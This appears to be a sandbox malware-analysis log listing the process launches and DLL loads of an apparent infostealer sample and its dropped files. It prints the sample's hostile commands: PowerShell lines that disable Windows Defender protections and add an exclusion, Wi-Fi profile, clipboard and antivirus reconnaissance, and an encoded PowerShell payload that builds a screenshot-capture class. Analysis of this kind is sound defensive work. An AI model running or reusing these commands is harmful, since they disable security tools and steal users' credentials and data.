                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline"
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46F0.tmp" "c:\Users\user\AppData\Local\Temp\4kug0kj4\CSCF8A59A62395742289D2EBFCBD5DF8363.TMP"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES541F.tmp" "c:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: vcruntime140.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: dxgidebug.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: version.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: vcruntime140.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: vcruntime140.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: version.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: python3.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: libffi-7.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: sqlite3.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: libcrypto-1_1.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: libssl-1_1.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: avicap32.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: msvfw32.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: dciman32.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: winmmbase.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: mmdevapi.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: ksuser.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: avrt.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: audioses.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: msacm32.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: midimap.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: dxgidebug.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: sfc_os.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: dwmapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: riched20.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: usp10.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: msls31.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: dpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: windowscodecs.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: textshaping.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: textinputframework.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: coreuicomponents.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: coremessaging.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: ntmarta.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: coremessaging.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: edputil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: appresolver.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: slc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: sppc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: pcacli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: mpr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeSection loaded: msasn1.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: version.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: dxgidebug.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: sfc_os.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: sspicli.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: rsaenh.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: uxtheme.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: dwmapi.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: cryptbase.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: riched20.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: usp10.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: msls31.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: windowscodecs.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: textinputframework.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: coreuicomponents.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: coremessaging.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: ntmarta.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: windows.storage.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wldp.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: propsys.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: profapi.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: edputil.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: urlmon.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: iertutil.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: srvcli.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: netutils.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: policymanager.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: msvcp110_win.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: appresolver.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: bcp47langs.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: slc.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: userenv.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: sppc.dll
